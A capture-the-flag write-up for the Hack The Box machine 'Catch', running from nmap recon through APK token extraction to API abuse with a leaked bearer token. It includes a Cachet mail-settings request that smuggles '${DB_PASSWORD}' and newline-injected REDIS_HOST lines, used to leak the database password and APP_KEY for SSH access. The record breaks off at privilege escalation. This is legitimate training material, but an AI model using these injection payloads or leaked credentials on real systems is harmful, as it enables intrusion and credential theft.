About Catch
In this post, I’m writing a write-up for the machine Catch from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Catch is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.
Machine Info
| Machine Name: | Catch |
| Difficulty: | Medium |
| Points: | 30 |
| Release Date: | 12 Mar 2022 |
| IP: | 10.10.11.150 |
| Creator: | MrR3b00t |
Recon
Port scan with Nmap
As always we start the machine with a port scan with Nmap.
1
nmap -sC -sV -oA ./nmap/catch 10.10.11.150
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 15:31 EDT
Nmap scan report for 10.10.11.150
Host is up (0.037s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: i_like_gitea=cd0e3aec29bc0927; Path=/; HttpOnly
| Set-Cookie: _csrf=KmL1zB2LzrSeuqdLkkzuyXBfYGI6MTY0ODU4MjYzMDg2NDEwMTg4MA; Path=/; Expires=Wed, 30 Mar 2022 19:37:10 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 29 Mar 2022 19:37:10 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Catch Repositories </title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh
0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Set-Cookie: i_like_gitea=64ae5bfea4fab3f9; Path=/; HttpOnly
| Set-Cookie: _csrf=YKpY7gGh7YxkWdl88DiLUqYjRks6MTY0ODU4MjYzNjA4MDY3MTQ5MA; Path=/; Expires=Wed, 30 Mar 2022 19:37:16 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 29 Mar 2022 19:37:16 GMT
|_ Content-Length: 0
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 302 Found
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Content-Security-Policy:
| X-Content-Security-Policy:
| X-WebKit-CSP:
| X-UA-Compatible: IE=Edge,chrome=1
| Location: /login
| Vary: Accept, Accept-Encoding
| Content-Type: text/plain; charset=utf-8
| Content-Length: 28
| Set-Cookie: connect.sid=s%3AufEqW9J3AzGppkpbAzqPspH4hSftMyeZ.aN9l0nGLbGJ%2F5%2F%2F%2FH%2FJ1PTmS0ORVWzBEeJzwhDn5G%2F4; Path=/; HttpOnly
| Date: Tue, 29 Mar 2022 19:37:15 GMT
| Connection: close
| Found. Redirecting to /login
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Content-Security-Policy:
| X-Content-Security-Policy:
| X-WebKit-CSP:
| X-UA-Compatible: IE=Edge,chrome=1
| Allow: GET,HEAD
| Content-Type: text/html; charset=utf-8
| Content-Length: 8
| ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
| Set-Cookie: connect.sid=s%3ARhV4T38uhNRWh73rUewd0tEsSwxMaW3O.2zYHa17op04iLlEiKC%2FzGvUje%2FSuibMKX1jzFIHpCEY; Path=/; HttpOnly
| Vary: Accept-Encoding
| Date: Tue, 29 Mar 2022 19:37:16 GMT
| Connection: close
|_ GET,HEAD
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.29 (Ubuntu)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-
service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.92%I=7%D=3/29%Time=62435E96%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,19F2,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=cd0e3aec2
SF:9bc0927;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=KmL1zB2LzrSeuqd
SF:LkkzuyXBfYGI6MTY0ODU4MjYzMDg2NDEwMTg4MA;\x20Path=/;\x20Expires=Wed,\x20
SF:30\x20Mar\x202022\x2019:37:10\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nS
SF:et-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly\r\nX
SF:-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x20
SF:19:37:10\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20c
SF:lass=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-
SF:8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20
SF:initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20conten
SF:t=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcy
SF:IsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W
SF:3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,17F
SF:,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i_like
SF:_gitea=64ae5bfea4fab3f9;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf
SF:=YKpY7gGh7YxkWdl88DiLUqYjRks6MTY0ODU4MjYzNjA4MDY3MTQ5MA;\x20Path=/;\x20
SF:Expires=Wed,\x2030\x20Mar\x202022\x2019:37:16\x20GMT;\x20HttpOnly;\x20S
SF:ameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\
SF:x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x2
SF:0Mar\x202022\x2019:37:16\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTS
SF:PRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.92%I=7%D=3/29%Time=62435E9B%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,246,"HTTP/1\.1\x20302\x20Found\r\nX-Frame-Options:\x20SAMEORIG
SF:IN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Security-Policy:
SF:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20\r\nX-UA-Com
SF:patible:\x20IE=Edge,chrome=1\r\nLocation:\x20/login\r\nVary:\x20Accept,
SF:\x20Accept-Encoding\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nContent-Length:\x2028\r\nSet-Cookie:\x20connect\.sid=s%3AufEqW9J3AzGpp
SF:kpbAzqPspH4hSftMyeZ\.aN9l0nGLbGJ%2F5%2F%2F%2FH%2FJ1PTmS0ORVWzBEeJzwhDn5
SF:G%2F4;\x20Path=/;\x20HttpOnly\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x20
SF:19:37:15\x20GMT\r\nConnection:\x20close\r\n\r\nFound\.\x20Redirecting\x
SF:20to\x20/login")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,"HTTP/1\.1\x
SF:20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(SMBProgNeg,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(ZendJavaBridge,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection
SF::\x20close\r\n\r\n")%r(HTTPOptions,245,"HTTP/1\.1\x20200\x20OK\r\nX-Fra
SF:me-Options:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content
SF:-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nC
SF:ontent-Security-Policy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebK
SF:it-CSP:\x20\r\nX-UA-Compatible:\x20IE=Edge,chrome=1\r\nAllow:\x20GET,HE
SF:AD\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x
SF:208\r\nETag:\x20W/\"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nSet-Cookie:\x20c
SF:onnect\.sid=s%3ARhV4T38uhNRWh73rUewd0tEsSwxMaW3O\.2zYHa17op04iLlEiKC%2F
SF:zGvUje%2FSuibMKX1jzFIHpCEY;\x20Path=/;\x20HttpOnly\r\nVary:\x20Accept-E
SF:ncoding\r\nDate:\x20Tue,\x2029\x20Mar\x202022\x2019:37:16\x20GMT\r\nCon
SF:nection:\x20close\r\n\r\nGET,HEAD")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSStatusRequestTCP,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close
SF:\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.84 seconds
The Nmap port scan has discovered various open ports on this machine. The first open port is the default SSH port on 22/tcp. The second port is the default HTTP port 80/tcp. The banner shows that Apache 2.4.41 is running behind this port. The third port is 3000/tcp. It seems that there is a website running behind this port with the title Catch Repositories. The second open network port is 5000/tcp, behind this port is there also a website running. The last but not least discovered open port is 8000/tcp, behind this port there is a website running with the title Catch Global Systems.
Enumeration
Website
We start the initial foothold on the website. After adding the hostname catch.htb to our /etc/hosts file we can visit the website through the URL http://catch.htb.
The website does not show much more information than just a ‘Download now’ button. After clicking on this button, the browser starts downloading the file catchv1.0.apk.
Enumerate APK-file
With the apktool we can decompile this APK-file for further analysis. Before we dive into the decompiled apk-file we can scan this apk-file for URLs with the tool called apkleaks.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[/home/kali/htb/machines/catch]
└─# apktool d catchv1.0.apk
_ ____ _ ___ _
/ \ | _ \| |/ / | ___ __ _| | _____
/ _ \ | |_) | ' /| | / _ \/ _` | |/ / __|
/ ___ \| __/| . \| |__| __/ (_| | <\__ \
/_/ \_\_| |_|\_\_____\___|\__,_|_|\_\___/
v2.6.1
--
Scanning APK file for URIs, endpoints & secrets
(c) 2020-2021, dwisiswant0
** Decompiling APK...
INFO - loading ...
INFO - processing ...
ERROR - finished with errors, count: 1
** Scanning against 'com.example.acatch'
[JSON_Web_Token]
- androidGradlePluginVersion=7.0.4
[LinkFinder]
- /...
- /proc/self/fd/
- activity_choser_model_history.xml
- http://schemas.android.com/apk/res-auto
- http://schemas.android.com/apk/res/android
- https://status.catch.htb/
- share_history.xml
** Results saved into '/tmp/apkleaks-oea2sdcy.txt'.
We have found the subdomain status.catch.htb. We can also add this one to our /etc/hosts file. Let’s check the decompiled apk-file with grep to search for juicy information. In the most cases I’m looking for words like usernames, passwords, secrets, tokens, etc.
1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[/home/kali/htb/machines/catch]
└─# grep -r "token" ./catchv1.0
...
./catchv1.0/res/values/public.xml: <public type="string" name="gitea_token" id="0x7f0e0028" />
./catchv1.0/res/values/public.xml: <public type="string" name="lets_chat_token" id="0x7f0e002c" />
./catchv1.0/res/values/public.xml: <public type="string" name="slack_token" id="0x7f0e0065" />
./catchv1.0/res/values/strings.xml: <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
./catchv1.0/res/values/strings.xml: <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
./catchv1.0/res/values/strings.xml: <string name="slack_token">xoxp-23984754863-2348975623103</string>
The interesting part is about to start: a whole bunch of rabbit holes. This section took my several hours before I figured out which gate to use to find our initial foothold.
Initial Access
API
We can communicate with the Let’s Chat service with the REST-API. Let’s Chat provides dome documentation from their Github page.
With this API call we can get a list of user accounts.
1
curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" http://catch.htb:5000/users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[
{
"id": "61b86aead984e2451036eb16",
"firstName": "Administrator",
"lastName": "NA",
"username": "admin",
"displayName": "Admin",
"avatar": "e2b5310ec47bba317c5f1b5889e96f04",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18",
"61b8708efe190b466d476bfb"
]
},
{
"id": "61b86dbdfe190b466d476bf0",
"firstName": "John",
"lastName": "Smith",
"username": "john",
"displayName": "John",
"avatar": "f5504305b704452bba9c94e228f271c4",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86e40fe190b466d476bf2",
"firstName": "Will",
"lastName": "Robinson",
"username": "will",
"displayName": "Will",
"avatar": "7c6143461e935a67981cc292e53c58fc",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86f15fe190b466d476bf5",
"firstName": "Lucas",
"lastName": "NA",
"username": "lucas",
"displayName": "Lucas",
"avatar": "b36396794553376673623dc0f6dec9bb",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18"
]
}
]
With the following command, we can find the chat rooms.
1
2
curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2Y
jU5NDljNQ==" http://catch.htb:5000/rooms
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[
{
"id": "61b86b28d984e2451036eb17",
"slug": "status",
"name": "Status",
"description": "Cachet Updates and Maintenance",
"lastActive": "2021-12-14T10:34:20.749Z",
"created": "2021-12-14T10: 00: 08.384Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b8708efe190b466d476bfb",
"slug": "android_dev",
"name": "Android Development",
"description": "Android App Updates, Issues & More",
"lastActive": "2021-12-14T10: 24: 21.145Z",
"created": "2021-12-14T10: 23: 10.474Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b86b3fd984e2451036eb18",
"slug": "employees",
"name": "Employees",
"description": "New Joinees, Org updates",
"lastActive": "2021-12-14T10:18:04.710Z",
"created": "2021-12-14T10:00:31.043Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
}
]
From the chat room called status we read all the messages that are being sent back and forth between the users.
1
curl -X GET -H "Content-Type:application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" http://catch.htb:5000/rooms/61b86b28d984e2451036eb17/messages
We have discovered some juicy information. At first we have found the username and password combination john:E}V!mywu_69T4C}W.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
[
{
"id": "61b8732cfe190b466d476c02",
"text": "ah sure!",
"posted": "2021-12-14T10:34:20.749Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8731ffe190b466d476c01",
"text": "You should actually include this task to your list as well as a part of quarterly audit",
"posted": "2021-12-14T10:34:07.449Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b872b9fe190b466d476c00",
"text": "Also make sure we've our systems, applications and databases up-to-date.",
"posted": "2021-12-14T10:32:25.514Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87282fe190b466d476bff",
"text": "Excellent! ",
"posted": "2021-12-14T10:31:30.403Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87277fe190b466d476bfe",
"text": "Why not. We've this in our todo list for next quarter",
"posted": "2021-12-14T10:31:19.094Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87241fe190b466d476bfd",
"text": "@john is it possible to add SSL to our status domain to make sure everything is secure ? ",
"posted": "2021-12-14T10:30:25.108Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8702dfe190b466d476bfa",
"text": "Here are the credentials `john : E}V!mywu_69T4C}W`",
"posted": "2021-12-14T10:21:33.859Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87010fe190b466d476bf9",
"text": "Sure one sec.",
"posted": "2021-12-14T10:21:04.635Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86fb1fe190b466d476bf8",
"text": "Can you create an account for me ? ",
"posted": "2021-12-14T10:19:29.677Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86f4dfe190b466d476bf6",
"text": "Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. ",
"posted": "2021-12-14T10:17:49.761Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
}
]
Access to the Status Dashboard
We can add the hostname status.catch.htb to our /etc/hosts file. With the credentials we are able to login onto http://status.catch.htb. This website is running Cachet 2.4.0-dev which holds three vulnerabilities.
Change the request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
POST /dashboard/settings/mail HTTP/1.1
Host: catch.htb:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------310896443037174447463705833016
Content-Length: 956
Origin: http://catch.htb:8000
Connection: close
Referer: http://catch.htb:8000/dashboard/settings/mail
Cookie: connect.sid=s%3AFRMmg1i7QWzsU1sc2RmJDoPKtqLR3TEI.%2BUurwNOUjapfUnIfaMLlHL6hTWA%2FMuaGfx26rM48V4Q; XSRF-TOKEN=eyJpdiI6ImU0VWV6M3RTMTlMRnl5MDg1WnlJTVE9PSIsInZhbHVlIjoiMjJkT3NKK3E1Kzh5cENObXU5UVNcLytsUUtOaFJYS3Y0TG8zTFwvWkxyR0RtWElnbHdyc0N1ZFNFamVLaVRzak1NIiwibWFjIjoiNTQxNTFkMjI5NzE1MDA1YjVjY2FiNDU2ZWU3ZTE1MDVkN2RhZDgzZDE0ZDQ0YjM5MmNmOWZjMGY4NzRjZTU2NyJ9; laravel_session=eyJpdiI6IjF2djBvVkpPZXk5eDFTa1EyaGVSb2c9PSIsInZhbHVlIjoiTjNSdW5WMFwvQlQ3MTZ1a1Eya2FQdWt4aDNTQWlWR0s1K2VsdXg1cTN1MVdpckFMelpMeVBCS3BtdXpZZTBMelIiLCJtYWMiOiI2M2EzZDIwOGZhMTNjNGFmOThkNDJjMTU2NjRjMWEyYmE4OGM0YTc5YmMyNThjNDFhODNiZmY0MWE2MTZjMjFhIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IndyZzhSSWVuY1R3ZFwvUkI3T0szUWVBPT0iLCJ2YWx1ZSI6IkFoWE91YkpaZUNsQWtWYXVPTHM0WXBabXhJXC9cL1JWdW50b1pPR2RNVFIyNDBJWEZuNEJjbTBiZlVNbUVLdFhWeUpDZnB1MGM2eVFVUmpmNkc2MmxzVzRFRkgzKzBXekdvUWx4ZEs3Q1U3V2VVQWRUSUZGMXBGMjJaK2xGQUJid0VYa1wvYWJnTmJiVkZWU0lGeTFlVVUyZFRvMmR6VDA0aTVUWkpHeDJBZnJYRT0iLCJtYWMiOiI2YTUzZWE5ZjQyZmJjNDRiMGM1ZDBjNzc0MzNiZmQzMTFlZDg5NzJmMTczYWRmZjhlNDI2YWY4YmRjMWE0N2Q3In0%3D
Upgrade-Insecure-Requests: 1
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="_token"
mcThhLWjGtiaNgCPJOF54G2vT2jN9wAdZoDZ81tc
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_driver]"
${DB_PASSWORD}
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_host]"
filefile\nREDIS_HOST=10.10.14.16\nREDIS_DATABASE=0\nREDIS_PORT=6379\nSESSION_DRIVER=redis
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_address]"
[email protected]
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_username]"
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_password]"
-----------------------------310896443037174447463705833016--
We will get the password: s2#4Fg0_%3!
1
2
3
4
5
6
#77 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#78 {main}
"}
[2022-04-08 19:51:13] production.ERROR: InvalidArgumentException: Driver [s2#4Fg0_%3!] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('s2#4Fg0_%3!')
Stealing APP_KEY
1
2
3
4
5
6
#77 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#78 {main}
"}
[2022-04-08 20:04:07] production.ERROR: InvalidArgumentException: Driver [base64:9mUxJeOqzwJdByidmxhbJaa74xh3ObD79OI6oG1KgyA=] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('base64:9mUxJeOq...')
Now we can do the same for the username.
We can read the username will from the log. So we have now this credential pair: will:s2#4Fg0_%3!
1
2
3
4
5
6
7
8
9
#39 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#40 {main}
"}
[2022-04-16 17:31:18] production.ERROR: InvalidArgumentException: Driver [will] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('will')
#1 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Mail/MailServiceProvider.php(102): Illuminate\Support\Manager->driver()
#2 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Container/Container.php(776): Illuminate\Mail\MailServiceProvider->Illuminate\Mail\{closure}(Object(Illuminate\Foundation\Application), Array)
#3 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Container/Container.php(658): Illuminate\Container\Container->build(Object(Closure))
Let’s try to get access with SSH.
1
ssh will$catch.htb
and we have access
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-104-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 16 Apr 2022 05:33:47 PM UTC
System load: 0.28
Usage of /: 74.7% of 16.61GB
Memory usage: 85%
Swap usage: 24%
Processes: 442
Users logged in: 0
IPv4 address for br-535b7cf3a728: 172.18.0.1
IPv4 address for br-fe1b5695b604: 172.19.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.150
IPv6 address for eth0: dead:beef::250:56ff:feb9:e5ac
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
will@catch:~$
We can now read the user flag.
1
2
3
4
5
will@catch:~$ ls
user.txt
will@catch:~$ cat user.txt
880a854601427167e7da9fdf7ea58b53
will@catch:~$
Privilege Escalation
Enumeration
After running the enumeration script linpeas.sh we can find the following bash script /opt/mdm/verify.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
